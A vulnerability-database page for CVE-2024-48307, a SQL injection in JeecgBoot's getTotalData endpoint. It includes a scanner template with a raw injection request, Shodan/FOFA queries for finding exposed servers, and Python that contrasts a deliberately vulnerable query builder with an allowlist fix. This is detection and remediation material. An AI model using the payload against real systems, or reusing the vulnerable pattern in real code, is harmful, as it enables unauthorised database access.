JeecgBoot v3.7.1 has a critical SQL Injection vulnerability via the getTotalData endpoint.
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
Veracode | SQL Injection | 12 Nov 2024 05:14 | – | veracode |
CVE | CVE-2024-48307 | 31 Oct 2024 01:15 | – | cve |
Vulnrichment | CVE-2024-48307 | 31 Oct 2024 00:00 | – | vulnrichment |
OSV | JeecgBoot SQL Injection vulnerability | 31 Oct 2024 03:30 | – | osv |
NVD | CVE-2024-48307 | 31 Oct 2024 01:15 | – | nvd |
Github Security Blog | JeecgBoot SQL Injection vulnerability | 31 Oct 2024 03:30 | – | github |
Cvelist | CVE-2024-48307 | 31 Oct 2024 00:00 | – | cvelist |
```yaml
id: CVE-2024-48307

info:
  name: JeecgBoot v3.7.1 - SQL Injection
  author: lbb,s4e-io
  severity: critical
  description: |
    The JeecgBoot application is vulnerable to SQL Injection via the `getTotalData` endpoint. An attacker can exploit this vulnerability to extract sensitive information from the database by injecting SQL commands.
  remediation: |
    Validate and sanitize user inputs on the server side to prevent SQL injection attacks. Use prepared statements with parameterized queries instead of dynamic queries. Regularly update and patch the application to fix known vulnerabilities.
  reference:
    - https://github.com/wy876/POC/blob/main/JeecgBoot/JeecgBoot%E6%8E%A5%E5%8F%A3getTotalData%E5%AD%98%E5%9C%A8%E6%9C%AA%E6%8E%88%E6%9D%83SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2024-48307).md
    - https://github.com/jeecgboot/JeecgBoot/issues/7237
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-48307
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.17463
  metadata:
    max-request: 2
    vendor: jeecg
    product: jeecg_boot
    fofa-query:
      - icon_hash="-250963920"
      - icon_hash=1380908726
      - title="jeecg-boot"
    shodan-query: http.favicon.hash:"1380908726"
  tags: cve2024,cve,jeecg,sqli

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST {{path}}drag/onlDragDatasetHead/getTotalData HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(md5({{num}}),0x3a,0x3a)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

    payloads:
      path:
        - /jeecg-boot/
        - /
    attack: batteringram
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "YzhjNjA1OTk5ZjNkODM1MmQ3YmI3OTJjZjNmZGIyNWI6Og==")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a0046304402205e6a3d5790483b0bdde032ed47c62a8c417e879b0898511f3099a2cb23166f1402207dcb78d5840d53b890f959a5d11ce8bf25d8515b6113b01fa0bddfb8591531af:922c64590222798bb761d5b6d8e72950
```
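The remediation in the template says to use parameterized queries, but the request body above shows the injected value arriving as a `fieldName`, that is, as a column identifier in the generated SELECT. Placeholders in a prepared statement cannot bind identifiers, so for this endpoint shape the fix has to be an allowlist of table and column names taken from the schema, with only the filter values bound as parameters. The following is an added illustration of that, not JeecgBoot's own code (which is Java/MyBatis); it uses an in-memory SQLite table standing in for `sys_user`, the request bodies and rows are constructed samples, and the assumed shape of `condition.filter` (column name to value) is an assumption, not something the page defines.

```python
"""Added illustration: identifier allowlist plus bound values for a
getTotalData-style request.  Not JeecgBoot code; schema, rows and request
bodies are constructed samples."""
import re
import sqlite3

# Plain SQL identifier: letters, digits, underscore; nothing else.
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

# Tables the endpoint may report on (assumption: in a real application this
# would come from the dataset configuration, never from the request).
ALLOWED_TABLES = {"sys_user"}


def table_columns(conn, table):
    """Column allowlist read from the schema itself, not from the request."""
    if table not in ALLOWED_TABLES:
        raise ValueError(f"table not permitted: {table!r}")
    return {row[1] for row in conn.execute(f'PRAGMA table_info("{table}")')}


def vulnerable_query(body):
    """The defect pattern (CWE-89): field names are spliced into the SQL text,
    so a fieldName such as concat(md5(...),0x3a,0x3a) becomes part of the
    statement.  Shown for contrast only; never executed here."""
    cols = ", ".join(f["fieldName"] for f in body["config"]["name"])
    return f"SELECT {cols} FROM {body['tableName']}"


def build_total_query(conn, body):
    """Hardened builder: identifiers validated against the schema allowlist,
    filter values bound as parameters.  Returns (sql, params)."""
    table = body["tableName"]
    allowed = table_columns(conn, table)
    cols = []
    for field in body["config"]["name"]:
        name = field["fieldName"]
        if not IDENT_RE.match(name) or name not in allowed:
            raise ValueError(f"field not permitted: {name!r}")
        cols.append(f'"{name}"')
    where, params = [], []
    # Assumed filter shape: {"column": value}; values are bound, not spliced.
    for col, val in body["condition"]["filter"].items():
        if not IDENT_RE.match(col) or col not in allowed:
            raise ValueError(f"filter column not permitted: {col!r}")
        where.append(f'"{col}" = ?')
        params.append(val)
    sql = f'SELECT {", ".join(cols)} FROM "{table}"'
    if where:
        sql += " WHERE " + " AND ".join(where)
    return sql, params


def run_total(conn, body):
    sql, params = build_total_query(conn, body)
    return conn.execute(sql, params).fetchall()


def demo_conn():
    """Constructed sample schema and rows standing in for sys_user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (id TEXT, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO sys_user VALUES (?, ?, ?)",
                     [("1", "admin", "<hash>"), ("2", "jsmith", "<hash>")])
    return conn


# Constructed request bodies: a legitimate one, and one with the fieldName
# shape seen in the template above.
GOOD_BODY = {
    "tableName": "sys_user",
    "condition": {"filter": {"username": "admin"}},
    "config": {"name": [{"fieldName": "id", "fieldType": "string"}]},
}
BAD_BODY = {
    "tableName": "sys_user",
    "condition": {"filter": {}},
    "config": {"name": [{"fieldName": "concat(md5(1),0x3a,0x3a)", "fieldType": "string"},
                        {"fieldName": "id", "fieldType": "string"}]},
}


def demo():
    """Returns (rows for the good body, whether the bad body was rejected)."""
    conn = demo_conn()
    rows = run_total(conn, GOOD_BODY)
    try:
        run_total(conn, BAD_BODY)
        rejected = False
    except ValueError:
        rejected = True
    return rows, rejected


if __name__ == "__main__":
    print(demo())
```

The allowlist comes from `PRAGMA table_info` rather than from a hand-maintained list so that it cannot drift from the schema; in a MyBatis application the same role is played by checking the requested names against the dataset's configured column list before they reach any `${}` substitution.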